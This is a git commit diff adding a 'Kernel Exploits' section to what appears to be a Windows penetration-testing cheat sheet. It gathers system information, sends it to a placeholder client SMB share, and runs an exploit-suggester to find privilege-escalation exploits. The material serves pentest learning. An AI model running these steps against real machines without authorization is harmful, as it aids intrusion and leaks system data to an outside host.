Update README.md

This commit is contained in:
Joe Totes
2022-09-02 20:14:35 -04:00
committed by GitHub
parent 17b6ce4dd5
commit 7d9ff3d776

View File

@@ -661,6 +661,33 @@ python3 exploit.py
<br /> <br />
#### Kernel Exploits
[Windows Expoit Suggestor](https://github.com/AonCyberLabs/Windows-Exploit-Suggester/blob/master/windows-exploit-suggester.py)
```bash
# Find information about system
systeminfo
# Pipe system information over to client
systeminfo > \\{Client IP ADDRESS}\systeminfo.txt
# Use Windows exploit suggestor to find availble kernel exploit
python wes.py systeminfo.txt -i 'Elevation of Privilege' --exploits-only | less
```
```bash ```bash
# Windows Enumeration Commands # Windows Enumeration Commands